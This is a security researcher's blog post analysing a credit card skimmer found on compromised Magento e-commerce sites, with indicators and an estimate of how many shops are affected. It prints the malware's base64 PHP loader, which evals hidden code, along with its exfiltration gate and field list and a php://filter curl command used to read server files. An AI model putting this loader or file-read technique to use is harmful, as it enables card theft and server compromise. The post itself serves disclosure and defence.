Security expert Marco Ramilli shared the results of an analysis of a skimmer implant spotted in the wild that could be potentially linked to Magecart group.

If you are a credit card holder, this post could be of your interest. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not sure hundred percent that the discovered implant would be an evolution of Magecart – since the activation scripts are quite different even if they do use Magento core infrastructure. We might be facing a new Magecart version or a new framework as well for my current understanding, notes suggestions are always welcomed.

Disclaimer

National law enforcement units have been alerted, few hours are gone after they gave me the authorization to publish this POST. Please if you used your credit card in one of the following eCommerce (IoC section) consider your credit card as a no more private card: call your bank and follows the deactivation steps. Since C2 and Relays are still up and running, in order to avoid replication, the addresses have been obfuscated. I want to thank Daniele B. for giving me the first “wired eCommerce”

Analysis

Everything starts from a vulnerable eCommerce web-site. The user don’t feel anything weird since she would normally get items into her web-chart, surfing from page to page watching and selecting items and finally deciding to check them out by register a new account or just as proceed as guest user. However the attacker could abuse the eCommerce vulnerabilities introducing a nasty javascript sending out information (for example: Name, Address, eMail, credit card number, cvv, expiration date, and so on) to another host, belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https : //*****. ] com / js / ar /ar2497 . %5Dphp . This POST carries out a quite interesting payload as partially (avoid info_leak) shown in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands to an external gate hosted on *****.]com . This is a slightly difference behavior if compared to the original Magecart which used to send data directly in base64 format. Mykada looks like a legit eCommerce website that could be compromised and used as a relay (one more difference from Magecart). A further investigation on such a rely shows a magento core installation (this is a common indicator to Magecart) which includes the js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php ) providing a nice tool to dynamically building-up a composite javascript file for performance boosting and compression rates. By using such a public magento-core functionality and by guessing file paths (looking for known public folders on the host would help you in guessing paths) we might obtain the original malicious back-end file injected from the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

PD9waHAgCmlmKGlzc2V0KCRfR0VUWyd0b3VjaCddKSkKJF9QT1NUWyd0b3VjaCddPSRfR0VUWyd0b3VjaCddOwoKZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5xTld2dFRFMWY3LzFlMmpETWxnSEYzazAxQTNyd2RMd2hhQk9VaVF1TXdtODBKaVd5eStlNXVnTkRwYUR1b1dLd2RwZDZtdjloUjI2b0Z4UmxrbkU1bkxGcXNVclZlS2xwdC9WZStuK2VjVFVnQ3lvc1Njam5uUFBmUGN6a3hUTjF4cFA1VFp6OS9mdUxUckowYTBsMG1PYTd1cG94MS9STXZqMDgrdU5TNG9XYXphVm54VENxelg5OG9iWmZNbERFbzVhMmNMVEhkTnEwWXE1UDBURnpLWmVLV2VIdFlkNDJrdjJhRE9FZEs1REtHbTdJeVV2L0MxQisvVFYxOGRLdDZYZjhQeDY1ZGZUdjkvZEtNNzlOVW92b0RoNW1KalJzTEpIMGJ4ZXYrcDdNblp2NzQ2OERNaFdvZjJPalViVDJwTkNRTXNKSEdUNTFrRGVwNUVHS1plQ3JSYURNM1oyZWsyS2JPcGxDd1A4NjJ0TWVicXNzUC9xU0U4RDVmNDJlVm9ybjZJSU1NVWxiUHVJNWtKUkoxMG9DZHk3aXB6QURFeG1lNjVOcVdhWUptdWJKS2hDemgrZE55NmhIZHR2VjhkVlgvN0tFTEU1OS9YeFg1YjFXOHVVSHBqY29oZFNBcWg3V3F1cXIrZjJiK2pvN0VZaGZ4YWJuRXZVeFBjdTJEalpRcjJWWnVnSlJjdFZ0dHlNV2JvNG9haW82RXRmaVc2RWhBaVk1b1duUWtwTzNkakVjanFpaGgvRzNZTE9OOWZXOVNibFdUZUJwU2U0YkQyNXZick42OTBaR2dqdDE2SHhiVTcyNklLc0VnM3RQVXFFTG5CQTA4RHc1RWlMMW9RRlhHeDhlWGlQbmRJQnB1MjkrM3QyMFVKSUo0cGJWRmxWQW9sdW5JeDFTY0YzWjM5NHc0UkFsTUJYQXFma1BCcmg1aVZzWkxwUm1rdElDQjdWb1lyOFBkSUtaQkV3cFcwSG1oTGNNREhmS2U3bGE4SDlpOHF6dXF5S0dPSFYyeTFrVzgzRDBmVllQYTdmbW9xb1Rtb2lQMURkZVh1UUpSSFl4RmxiRGEydDAyRk11UU9Qa1lxVm93aHRmaEVTY1dNRnc4VXdLa0FiT3ZlUStwRWlwTGdodTFaV2RvZTB0SFBrNEhrbkJjQVdjdmpEMDY5Q0Fha0lPTHAzN2s5SHFFQ2pnWkNCTEMwakpLcEFLY0JrcGRnUjFRQUxlQ2F1YmFVeEJIK1Q4NjlNdWIwQ3RzWktoUk5ZRFA2K056YjdnRGxMdW5rOVpGNkVsdWtvSXdabGt1K1g4VnpvZ3FBUnhRSDN6OTlaWFR6MytJcXBwR3pJR2VxcEJyd1FCeGI5WEM3VWRUSUtYVDcvUzNLL3lzUFNubDRXcDFvS0c3VW9JeDA1RUd3QVhSMlRFUTRVbzRkaElFQWc4dlIwY2FJR1M5UXFSMjdSYWZIWi82OCs2SlAzLzhkd1gvbmNSOVhlRlBuakdtNjhsazB1Ty8vL2wzYzlGQUlEZzUvcHBPNitwcENPblFYRzludmRKS3h0dzA4UEUyOHN0c0xFMm1IS0xuMERFWkxqN1FaZTRlYU92RVN6aE5XRzdQNDAwVkQ2SGdmdTVaOE95ZEtYd1VDbi9jU1IrMVFBMHFkeE03bHEvUHczazFtQ0xZUlB2aStBMDJrZVhvUlNjQ0tFakJReUZWdjhQc1N6Y0VXMGZGc25CREswNVhONVdvOXNGWEwwN0JOV0RCaG9iVkRKZ21mSEdzTkpOY1MzZGNqcHNNV2tZOEEyd0VlZ0tRL1ZJcmZkTCtJZjRPTWtlSzVWeVg0UlBUbEZJWnNjcXdvVVcvdEJNd1NBb2tiU0NZNUpDSEp0d1NSdzlNL1hvR1lLS0NKZkFmRDZ5d05ia1NCeFN5OVVjNFIyOXVHSTF6aVFwNE5IYnZLWTVRdnZ1T3JCTEw3SEVocDBJbUNPVzUxZTdmT3ZQN1NSd2UvM1Z1RllHemNCOGhjRXpQNEo5RHpQYnRUUTZUQ25jVEhjN3B6T3M1QkxGTVVVVmthTUZPd2dQaFVSZFBqOFBkZ3RFUlBYUUJsQkxrSnRkb1hTL0JTcC9xS2Y5bmVHTDk5M08zVi9Ib09tbVluRm0zR1JkNXdNcGtkQW5wYWpqbEppRzc1VEFTdmkvTjBSS0dOUVJlcVhDU2tFWUM5eWdtUno4VlVScFFBOGNYNXFlUG5iOURQRkJvTjI4YmpUY1Q0TmJIQ051MGd1NStQVXlvQkw2MVMyL3ZVSVN2ME5BQWN5VW9KOHYwVE02RjNYZUpKMUxDdHRKZ2pOUm1tbG5kSGlTOTlmWjBEQnJwUGFQR2NLUkFnWUlQTGgrZW5Mb3cvK2dHQnhDRTVBb05lTWVTa0wycUNlRmt0cHVPOENCZFVTN2NnMmlCY3dzblBaRUNnUTc0dGh3WDNxOFY0S1AvMm0vMy83MDQrVEtxaHJUenRKU2xzU3c0VEI5OWpqZVZHMWNQaXhPUWcrQ0hEWlNNS0Iwd0FRNGNwQUtCd093LzkwZzFNVnByRU9EV0QxR1dTSGR6aHM2L2hNcVV4Vm51Q2oxS1V1OFo1dS9mbkh0ODdjYzMvTzNPYlIzZDNkc2E5blRMZXpyM3l0dGF5RmJkV3JkUVNRTmNKUlo2eVQwS1hnLzVBbU40VUZkby8yT1drWnJ0VkNMQjh0SU8yMDhwbG40OFVPb0NTMnlQQ3ljTFVRb1EvdjRqV0lzZC9BY3dIWGgxWVlXZWUwcTl6TlhOUVNvYzlKaVY0OEhWMFV5cHplM3RNU2xUOCtpNWV3Q015Y1RjeWNjOHduWXJoRTA5OU9IRUlsUVVqcXJod0pXdnI2eU1yUS9Ua3BObEdiY09ZYlkvbDg3Q240Y3p3QWZYNG80RHY0RlVCQ05PMnVLVlMwSjNrUzJveWtuYTFqQUtDR1BRa2NBdnJUWjAxeEU0b3NLYnlVSDZDcG1EMjIxRVN4eUQ1UEVYQjhtTi83MUVyTFlTU0lvSS9lZmdyVCtlUXQrQlpldnp5aUZrOE96ZkxLcVFrTlpIK1JqYjVMVE9hNDVpMkpTbVdDTDI0TzRGRGx5cUdweUh3OGhldElmaXBMb0Fsc3NFeWthdWo3Q2REblI2a2V6QmRvd1RScG5nOW5uNTZNSENPWlFKSVhnbnBhb2crZm1yR2U1RHpRME9wZUxtUFhuUE5hY0p0N0ZJdS80UVVCU2lSZHNwUjBjSzdrK3U5QWlNZ1drOS9PaklDdnQzSlZPT2hQK09tOHVtZU1ic1RadE9qS0xJRkx4bWllMVl6N1pzYkpOZzd3MmgxaXNxcS9DclBiejhKeGVWZGpYVEZ1Z3JPeHB2MldHS2xJWGlBR1laOGJRRWRrTVVSaFNPZDYvZkVrcnlGQTkxQitnSTJqZWFIWTRGMm1TQ1M3VmhrTjd4ZFBQdG8vSEYrL0JscFdDMk5OY3ZZWnJIOHlncE4wL09FSTVucWFnTFFMdEJwT2JkQlZOTi9nRTJBbytCMEtFaUF5YXZlRWlBMGV4K2ZXK0h3Q28xRktKTUVmdCtDYTdDWVd0bGplQmFHU1p0c2N3NG5ySWhKbTNLT2FpK3BZSFVFUEpnMmt1ZU1jYnNvbktiemFKblpmZkhBcFNaY3ZFV1VkR0NXYVJ0MVJ3ayt2UGZnTHBlVDBubStZM2JLOVVzRjZxQ0VjSTB3QklBY0FqVkJnRzZaLy9udjV5QXZoUFRFeThnYzNoMmdxc054UUVTZ0w1VjVpbzlkK1g0RlhoSWVPWWhSUFgwcXFnRUpjUlowcXVTU0hFelkvZklLUmRmSCtHVldwcmtDQmVxcUJkUDV1OHRQS0lQdWdkcFl4dVY0SlRmTzdhUlNBQzJZS2lKbmdjYlJOVjErZFE5RUF6KzloZnQwVnM2Wk9Td1lQM09VR3UrZ1NCTUM4ZE5nME95WXFUYlNFQlJzdU5rcFZXTko2bnMxVFJDNFFEWDNSQnJHZVFISDVwRi9JVy9nTmo2d3ExSjNyT2t0MUhKcERSblIvZUtLamNZeXU5YVR1YVVKTzljaERlSDVwWUkzZTUvNlFWVHVhbDdkRXJDUFRaelhKT1ZHSjZRc3AxRGkwaHlhTk0rUTR1WWNoem1scC9RNjFXUWhOWm9LWGUxZDNaOUlscFp0STdGWHBQcmVqYXF5aHB2dW56N2ZMNk5MVTJidGpiWjFhc3NwdjdyNTR0VlBsOWprdWxibXpwV1hmT0VkMEMwQnVldzFkZmNoYS9KbFBwdlUxWStQbmNVVGlHTFBYcDg5WE1KZ3M0Q3F3TFVZZHlsOXNKWDJmWnVTQTFrTEp2VmJGanVOOStjT0hqMGM0Zy91M1QyOXU5ZitqNWQxLy96ekpNakUzOHZYbDY0R25rSEZjU2Zlbk5wL3V4WGFETjhqUW5MeHY2bHQxL2R1M3htNmQ3dnM1RnFPUnlxWFM4cklSVVBzcUpXWkI3VUo0WmxvYTdqTmpNb1dCM2trR0VkNlVTS3BkRDhJKy9raDNscnZsNmlJOEloWDhVWW9ZZngyZ2NDSkhVYm1jcmhxY3BPeGRseUNuTnlHZGdjaDVReTl4K255MjVsbVdXQmNYQ0Vmc3FYMVViV3kxb2w1OExsakh5TTJmQXlTS2lGNVEwMVcxTzJtLzhZdlR3S2dqcXF0WkZKTXg4aUx6TFUyeEFrWnNYelV1TjZueEFHNXFtRlJFSEZoNzcrcDIvL1B2ckY5OGNpbmQyYndWYVJwN3BTVHVxZ2dFQ29qRXhQMGlwVUNSOTVLZ3FFZlkzcitoZCtQM0hwOVdURXliMzd1TnBxNk1kbnQrZmF0bGJML2tEWlQyM2xHNVVsQXdCMXdIS2xtR2xCMlVrOVpVTmVNOGNrbG1jTzFSSERsajBvb1ZxQkhVM0xoWW9xRC9TUk5Gb0lHZ2lxbkcrTjJGNTJPUCs3UEc1TTlLVlRWVDUvUVV4L1VYK05MQk9IRXhZbU9OMGRyZkVtdzRxejZ0S2pnUVBMVHYvZzV1M3BveGZLdlA3eHRTT3pCeVlqYkdSWHE3VzFhZFdZUkNTR2JqK2lPb1o2M3dlVXNxaVFxL0xWTFh0VFdmaUlnVTJsNzI2QzhyWkRmVU5VVmFFNGg2dWtrSlgyV3pFcHpreGtLcHZLUGdnazdkS3p1clREU21ZK2RLaHpTK2VsWm1ZUjF0blV0YTJNdS9WeVVBM1cwZ1BSTFBHWVh0U1RqcFdqYW82TjVQMVV4Y1VRUGxSbUR1c1oza1BnZk5Fd0dEQ2gxMHNhdXUydmpKOXlXWGJxaUFhUlZTMXN0N2tvZmtFdmFlVVEyZ2ExbmJsc21Td1VxN3lYMVRPU1pjZVpYYlBCU2ZXeDltM1ZCVHVRSWt1Y3RyWk1taFk5cVg4Z3RYOWNzNEdDYU82blArNWRHWHNjWVh0M21lMWIyYXFXTzNieWFzbTBnZXdseUh4U1NtV2ZyeEdKb2pQVjE4UVo4YzcxL2FjUU1aazRJaVpVK2hPdXJYeWpuRThnZ1BVQjRpYnVUZjh5RWh0eGJYMTkwOTZ1amsyU3Fkc0Q2TjFTbzZNNktuQzA4M0U3bGMyUzdYbGY2ZWc1Zy9sNUVKWFRRQUl5TEJvcTVsaWpHRjJXT3QwblJjNC84Ump2SnNacjVVb0FOYzA2S1pHeUhWN0I1eEc3WkMxSHo5ZEpWWnh4bXVDSWNyVEVkSFZTRXJWL1dzK1RCek16UzM1U1JTdFpSaHpEVVUrTW1CZzFHRVpLTngweDRlV0x1TXR4VW1reExJV2JjUmZ3UzUwV255TncvNUQycm04bDlmaEZUK1JhWERHT0pHYkUzR2tKZ3N2aGQ3dHdadFI5ZGg2OFp3WUFUM29zL3dIOFpOKytTTGZkR21kR080ZUZNZzExSURBSURGV3R0dmhRZ1h5TzBJVmVDTkE4SjQ1MUtBZkswYWZVRktXSWMvalMxTk94ejUrZmVnbnExNzVaUFBQaytzU1hKMytDSTA1K2Yrem8yMnZQM2k3OFFpaDA2OGJGaFgvbkQzcklVY1RxZUhXd0lWelArU3FSdHp1ZDl2djl2Y3dCTTk3bmxYL0wxbmR5NVgySXpCRWppQ0ZQSXlzSkQwVFNCTDRnWmgwbVphemhqNlF0T2oybFBqRko0YTBEOUJuSWNWTlNFNWpLRE9KVFdKdFB2WFdLOTJHWWtRRERWMW1zTmRNQUVKa2ZubDNjUUcwdEhERGhNcmhGR3Q3c29rUUhGNmdOQmtzY2hwTkFaQXpSMEV2NEMyY1NaRnc3eHpiVTFOUmtpVlA4M1ZEbjJiTWJDbE9DdGZ3LzUyVlpDU1NQYnFZdGgyaG5VaWc4NGlMY0lIeFJBcWtsWjl0NW9CWmNKd0gvWmQ3QjdkM0lta3FndHZCL2haeUVlNFpPMlQvSlQ2REJwOUN2eDI1ZFNmcFZOVlh6YXl2YmNvc2pQZW9mc2dPTmwzSURTVmhZTEMvL3d4a29VY0NxV1V0VlFvV1pxcTlBbnpTa3lYSkRMVDNnbE5VMlB2OXU3ZzJOVXlscGE1cjZEbGRDZElMYmhBMUVRblFpYVlGcEt0eFFrOGhBSFZVSkJzdEZiSUZROFZTY3gvRWdlVnJOaHNoL2wzWFR3WUZXYVZpaEdWcE1RK3VjeUZ1ZW1wbHVVL1l5dUxONkxIbXB6RE1uOGJwZE1tbFNscWNMRlh3czNHdFlOd2Z4d2tIUlNBa3htM05Md29GUFE2ekN0TlJLSkJqOFQ0K1pISkZYY3JmSkc5cllURWUxQjBlbDZqU2pPMjVlWU5CSDNMS29jSk9vbjNpaEs4aFlReXhUUExCRXY1WmxKY1VnblZoelhKYmxkUlVTODdKa0loSzVQNXZTTUJQallDcW5BWnE2blNhMUlPOFNkWThDN0N5SHdqSVZybkpGT2xpMkovcGxNU2NXMVFBTmU2dzBiQVFuVUZWTmxMQnFlVXp4dTZVNnpzcXdyWXNVUm9BeXpGQUEyN3pzRUtxblJxc0UwdVJhL3Q5WEo2T1hWQ3JORFFQRGwxQklaZ1lnSy9xOGxGTmlJRktMbFdVZW05YUlkNGM0bXNxU080b0x1RUpjaThva2lSVithWlBEeDhvWmhqenNNcjRiUVlyRVpTUVpRNkRUbE4zU2FSQW1NY054ZFNQdmw3cXdLSjF6dUNaRThiTGQxYzBVVmlGSE96cVNPRlhqL0VaTk5BRGNScFMrS1h0U3lqQlNnQ3dUQ0dOWlBESHhBc3lrVEpxSGdIcWN5RGtNV1QzdWNCYjVZSjFSaFZocUJXS09qYVJjUG9FRE1mN2hjdVQ1T2ZaU3Z4VFFLdm9GYjB5WHlCbURQTnlLSlExUWlNQmsrUmZHQ0dqVXZhRzRqZnlYZzkrS1NqTExiT1JBbHhHME1RZ0pyM1JxYXR3Qy9vSTNvRnRRcm5EcGJUVTFnNVNvWkErMnZLN0xJL0h1UG90SzJaMVdPcDNmQ1VVNkRqbHJ6b2FoU0VlODF4dGlDRFlLVFJwUW80SXJ5NmtiaXpuMWt5SzhBTU1WZjFpckxYbXNZSUFVeGt1MkFSMjFTWVk3ZElZTFNZbWY3L0R0aTVSVkQxb2xseUlvcURUbUpsKytLQkUxSGU5OENxekpha0NUd3hSaFliVWlNdHR5dEYyaTJvSlBzQ2c3V0NRL0hCWnd5T3NTUUFNWkh2RVpDcTVNU0RFVUtBUTBOdUVTMnVVaDVyZ0MxMnc5VGhuUTRSd0Z0V0FndUM5U3FyMWllVGx4OU1xUmJ5SUdTcWorVkZ1cXE2eUc4VFVhNkxqNm5TWVVhVzYvYm5lZ2NQRjIxQlVsSkdHbjd2N3k3OWpYRVNPSDFXeWthVXRobGE5WU9va1ZzSGMxejJob21UK3IxR3JLRVJlTEtiTEV1djdwRjk4ZS92VmhwTkRRRmFjWjd4cm0wQWlXbW9ENGkxTzN6MFZINGdZZjZGRGQvMEhoTU45R2lyR2k2SmZIYjAwdG5mbzZVdmg0MVZPUDBqU1Nia1dWTXpkK2ZZWXpzZkh3d1ZzSHh4N2ZPWEgwMi9mdkhidjNkT2E3cUJwVXhMYmY3aThjbjMvL2p1ZDA1WExyRE1qVmk2c3pHaGlLM1NmL1B2dm03d2N2SngrODl3UngyUnRUWHRQRzhidGk2NVdsbTRmdkg1cSs5SDdhRjArUC84VG40U042Z0NaN2I2N1I3cFZPTjZ6VGxTUDNNdGRLNnk1OUtVSjhyV05kL3c4L3Z6ait3OHloOTdQSTU5T3gyRGdSbTd1OWtraDV4cVZ1bVpjaHpFbEtXZHVLQTN5NWc4d2RPbjEyN3RuN1pUcnpqR3FraFhuSXhQQXNDSkx5SFVHeDNQbTI4eUVWTDMwcG9vRjdGTlIxMUZUbmRPUTZBMGxuZTl1ZTl0WTkyOXVhUzNDSlNzb3R1bWgrZU51VDRpT1NsRXVqUzRwbTNwWUxJUVRibC82NGR2bUhIOGF1Ly9SK3pzVU40YVZMYis4c0NTTSttNXUrOFdqcTZ0djNiL3M4T2hKT1RFNWRpQVprQklQQjZLNWsvcVNRdUJoNjYvcS9tUDdwMm92bjd6L3FQZzBjY1U1NDh0d0N2enZrYkJ5OU9IWDc3STFiYXpvaDNRZEM2OEZKdUhFOVhZeWNGL3N2SG52NTZ2VC80Qi8xeWd4ZEdmSTlYeDQ5Zm01eC9QM2N2cVpwdEhZdnFzcWhDYkhyd2FYeE4rZmZ2K244eSs4V1o4WHE2OCttRDVCdU81czY5alIxckxxYWJobWpxaWEvOGJhOGVEbjU1SmU1eDQrTHc2RGx0MWJkLzgzTmwrTjA3Ymc0OWdBSFJFcHhaSzJ0ZEQxeDllQS8zNzY2SUhaNjBMWFd0dWQzRC96KzRPUmp1alFWK3dwSXNNWkdNdURFNHBHZjZYcVI3K1BRNVY5MS9qTDE0dURTdjVmNDlLNElVV3NkRHd2L2MvQVdzQzc0ZE9Ld29PQWh4Ly9BbUhjRCtNMzhTN0ZUNE1DS0w2TzVWczVJOHJnczFQcG9GRnlBUjUwWHJBNnY3Nmc1UkZtckE4QVF5cDFJRUdhZVE5bWFiSWpid3h0ams2OW15a1R3djBQaTZYT0hyajljNElyeVdGN0Rlb3VQWnVrMmtjTDRpS0RBWFhxdGJXL0dYejJoRzBPb1Y3djhwOWhZQkowVmF1S0RkYTRlK2k0SjNmeldGZW9aR2gweDZnUFRLTmVBajNUUkJtQWNzSFcwVm12cXFQLzB4Q3hkUFhMNkhtcXM3ZVlOTVlGYTlmV0xsQXJQaWUwQ3JsYUFkak54Z2dLWk9kUXdJbDJZS01UNW9KaFhVMzQrRFMzRGRZN0lOTzhROHhFemxSRXlHUWhoeXhVZHdHak9NSkkwUUZoYlJISERDVWJEMDRMUkFraFhxQmxPVmp5VjAyS093NXppSkpaSXIwM3M1c25YNUhCTFJ3OElXaHhKS3dodDFkTVozaGQ2VldCcUlPbDYwejRxY2FuR2FtbnZXcHZXL0RjbmY3eExkNkdja3NCZk10Nk5INStjdm5veXNsbDM2SnVVckcyTHRaVlY3M2VzdHY2bU5vT2VMNS9yODVWc1FHSEkyb3gyc1VDOFJ4OHYxNk9SMWFzaE5heWQrSHA2QXFnWm9zdkQyUWtlUHQ0Sjd3bzB4S1dtSHI4eVIxODdlZmdFTzBDOXFZMS82ZFBEZWQrcVVEWXpSdGxPM0x3aWo0UTVyZmZrQStKS1hNWWlIWlNNQVZkZlc4OHVuN3FIK2s3Vy91Smo2cEpPWm9WajgzYVBHVWxMV24zc0kydmk3dlhMQldoSW1RU2pPOTErZXhOZC9LRHRXUytIZytqMVFrRTVyRlJjOU93VThaSEtPdkI5eDBXVFRaVUpiMnF0aENzWmRyNTRRMkNpci9EVEJqRkhjVVJnMFJTUG1RenJkR3EzY3huMHNrNVNUTFhzdFBoV2lac3lCdk0wdHpGVENaT1BNNmljb3VPb2xTRytna0c1VXVUbFRoYk5wT2dGOEpEVzQyWXE1b2daQzNvaFY1ZlE4QmNQVXBSUXhVVmVMM1Ztd3pTcDNvNDRGeFdreHlTaldVVXBXM1Y4dk1MYkp6R3NwZ0d3TjlIT1pZdGZxS01yTUwvVWhwWitlVGpsTU9obWMwME5MM3Ryb1hSWmxlV3c3MTBlU1FWOTRPS0x1YVhmNy9QcjhpcGZZMGtuMHZqL2ZlODJwdz09JykpKTs=

We are now facing an initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. You might appreciate the activation variable “ touch ” which would activate the process in both flavors: GET and POST. Once the activation variable is found a compressed and encoded payload is fitted into a multiple variable concatenation chain and later executed ( eval ).

Fig2: Payload Stage 1

By following the reverse obfuscation order chain we will end-up in having the following code (Fig3). This time the attacker used more obfuscation techniques: from charset differentiation, junk code to spear random comments making quite hard the overall reading. But taking my time, ordering every single line, substituting variables and encoding with my favorite charset I was able to extract the decoding loop and to quickly understand the Payload behavior

Fig3: Payload Stage 3

Indeed, once the script decodes the received payload (by rotating on charsets with hard-coded strings) from the compromised eCommerce (Fig3 decodes touch variable content), every stolen field is ordered into a crafted object and is sent to one more external host: https:]//^^^^^.]su/gate/proxy . The following code section would help us to understand the execution chain.

REMOTE_ADDRContent-Type: text/html; charset=utf-8Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Origin: *%&=Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0touchhostnumberexp1exp2cvvfirstnamelastnameaddresscitystatezipcountryphoneemailHTTP_USER_AGENTNumberDomainCVVDate/billing:firstnamebilling:lastnameHolder billing:emailbilling:street1billing:postcodebilling:region_idbilling:citybilling:country_idbilling:telephonehash=&ua=&ip=https:]//^^^^^^^.]su/gate/proxyvar js_ar=;

We actually have one more host that need to be analyzed. By taking a closer look to the used domain, we might agree that it looks like the ending proxy gate which stores data on a given database (mongodb). Again by enumerating and seeking inside its public information it was actually possible to spot and to enumerate the used technology to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory – used to store temporary files between the attacker infrastructure – I was able to build up a simple monitoring script which revealed the most used compromised eCommerce.

Attack Magnitude

From the command and control host we might observe what is actually passing through it, but we might have no idea about the overall magnitude of the infection chain since many eCommerces could have a low selling rate (rate of customers during my monitoring phase). In this case even if they are compromised, it is very hard to discover every compromised eCommerce by using this technique: looking, converting and importing temporary files generated every time a data leak happens (every time a user adds his credit card). So we might ending up with another method. Fortunately the host reserved a PTR (Pointer Record) to mo-------.]fvds].ru as shown on Fig4.

Fig4: PTR on ^^^^^^.su

The new host ( mo------- ) definitely recall the mag^^^^^^.]su registered email address ( mo------@protonmail.]com ) in an unique way. BTW It is active since 2019-07!!

Fig5: registered eMail Address

According to URLSCAN, using the PTR record in order to understand how many known websites have links pointing to mo-----.]fvds.]ru , you might find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce. Now, I am not saying that every single eCommerce in the list has been compromised, but taking randomly 3 of them (and reported in IoC section) I found the exact infection chain on each one. So potentially every eCommerce on that list (so that points to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io most of the websites pointing to momo--------s.]ru respect the following geographic distribution (Fig7). Most of all are US based followed by RU, NL and IN. While it’s hard to say that it is a targeted attack against US eCommerce websites, stats (Fig7) are surprisingly talkative.

Fig7: Location of Possible Compromised eCommerce

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

Pierluigi Paganini